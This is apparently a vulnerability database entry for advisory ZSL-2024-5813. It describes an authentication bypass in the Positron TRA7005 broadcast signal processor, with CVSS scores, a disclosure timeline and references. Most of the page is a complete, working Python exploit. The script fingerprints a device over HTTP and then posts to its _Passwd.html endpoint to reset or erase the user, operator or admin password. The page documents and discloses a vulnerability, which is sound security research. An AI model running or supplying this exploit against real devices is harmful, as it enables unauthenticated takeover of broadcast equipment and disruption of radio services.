CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS4
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N
AI Score
Confidence
High
EPSS
Percentile
39.6%
Title: Positron Broadcast Signal Processor TRA7005 v1.20 _Passwd Exploit
Advisory ID: ZSL-2024-5813
Type: Local/Remote
Impact: Security Bypass, Privilege Escalation, System Access, DoS
Risk: (5/5)
Release Date: 04.04.2024
The TRA7000 series is a set of products dedicated to broadcast, designed to guarantee an excellent quality-price ratio in compliance with current regulations and intended for individual broadcasters or radio networks. All models in the TRA7000 series are fully digital, using only high-quality components such as 24-bit A/D and D/A converters and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper for both analogue and digital audio inputs, change-over emergency switching between any input with adjustable thresholds and intervention times, both in the switching phase on the secondary source and in the return phase to the primary source. Ethernet connection with Web-Server (optional) for total control and management of the device. Advanced BYPASS system between MPX input and outputs, active on operating and power supply anomalies and can also be activated remotely.
The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication bypass through a direct and unauthorized access to the password management functionality. The vulnerability allows attackers to bypass Digest authentication by manipulating the password endpoint _Passwd.html and its payload data to set a userās password to arbitrary value or remove it entirely. This grants unauthorized access to protected areas (/user, /operator, /admin) of the application without requiring valid credentials, compromising the deviceās system security.
Positron srl - <https://www.positron.it>
1.20
TRA7K5_REV107
TRA7K5_REV106
TRA7K5_REV104
TRA7K5_REV102
Positron Web Server
[22.03.2024] Vulnerability discovered.
[22.03.2024] Vendor contacted.
[03.04.2024] No response from the vendor.
[04.04.2024] Public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://packetstormsecurity.com/files/177939/>
[2] <https://www.exploit-db.com/exploits/51970>
[3] <https://nvd.nist.gov/vuln/detail/CVE-2024-31830>
[4] <https://vulners.com/cve/CVE-2024-31830>
[5] <https://cxsecurity.com/issue/WLB-2024040068>
[6] <https://www.cisa.gov/news-events/ics-advisories/icsa-24-207-02>
[7] <https://nvd.nist.gov/vuln/detail/CVE-2024-7007>
[8] <https://vulners.com/cve/CVE-2024-7007>
[04.04.2024] - Initial release
[10.04.2024] - Added reference [1], [2], [3] and [4]
[22.05.2024] - Added reference [5]
[04.08.2024] - Added reference [6], [7] and [8]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# Positron Broadcast Signal Processor TRA7005 v1.20 _Passwd Exploit
#
#
# Vendor: Positron srl
# Product web page: https://www.positron.it
# https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/
# Affected version: 1.20
# TRA7K5_REV107
# TRA7K5_REV106
# TRA7K5_REV104
# TRA7K5_REV102
#
# Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to
# guarantee an excellent quality-price ratio in compliance with current regulations and
# intended for individual broadcasters or radio networks. All models in the TRA7000 series
# are fully digital, using only high-quality components such as 24-bit A/D and D/A converters
# and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output
# MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper
# for both analogue and digital audio inputs, change-over emergency switching between any
# input with adjustable thresholds and intervention times, both in the switching phase on
# the secondary source and in the return phase to the primary source. Ethernet connection
# with Web-Server (optional) for total control and management of the device. Advanced BYPASS
# system between MPX input and outputs, active on operating and power supply anomalies and
# can also be activated remotely.
#
# Desc: The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication
# bypass through a direct and unauthorized access to the password management functionality.
# The vulnerability allows attackers to bypass Digest authentication by manipulating the
# password endpoint _Passwd.html and its payload data to set a user's password to arbitrary
# value or remove it entirely. This grants unauthorized access to protected areas (/user,
# /operator, /admin) of the application without requiring valid credentials, compromising
# the device's system security.
#
# Tested on: Positron Web Server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2024-5813
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5813.php
#
#
# 22.03.2024
#
#
import requests,sys
print("""
______________________________________
āā³āā¢ āā ā āā ā ā¢
ā āāāāā āāāāāāāāāāāāāāā« ā£ āāāāāāāāā
ā» āāāāā« ā£āāā»āāāā»āāāā āā» āāāāā£āāāāāā
ā ā
for
Positron Digital Signal Processor
ZSL-2024-5813
______________________________________
""")
if len(sys.argv) != 4:
print("Usage: python positron.py <ip:port> <user> <erase>")
sys.exit(1)
ip = sys.argv[1]
ut = sys.argv[2]
wa = sys.argv[3]
valid_ut = ['user', 'oper', 'admin']
if ut.lower() not in valid_ut:
print("Invalid user type! Use 'user', 'oper', or 'admin'.")
sys.exit(1)
url = f'http://{ip}/_Passwd.html'
did = f'http://{ip}/_Device.html'
try:
r = requests.get(did)
if r.status_code == 200 and 'TRA7K5' in r.text:
print("Vulnerable processor found!")
else:
print("Not Vulnerable or not applicable. Exploit exiting.")
sys.exit(1)
except requests.exceptions.RequestException as e:
print(f"Error checking device: {e}")
sys.exit(1)
headers = {
'Content-Type' : 'application/x-www-form-urlencoded',
'Accept-Language': 'mk-MK,en;q=0.6',
'Accept-Encoding': 'gzip, deflate',
'User-Agent' : 'R-Marina/11.9',
'Accept' : '*/*'
}
payload = {}
if wa.lower() == 'erase':
payload[f'PSW_{ut.capitalize()}'] = 'NONE'
else:
payload_key = f'PSW_{ut.capitalize()}'
payload[payload_key] = wa
#print(payload)
r = requests.post(url, headers=headers, data=payload)
print(r.status_code)
print(r.text)
</erase></user></ip:port></p></body></html>
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS4
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N
AI Score
Confidence
High
EPSS
Percentile
39.6%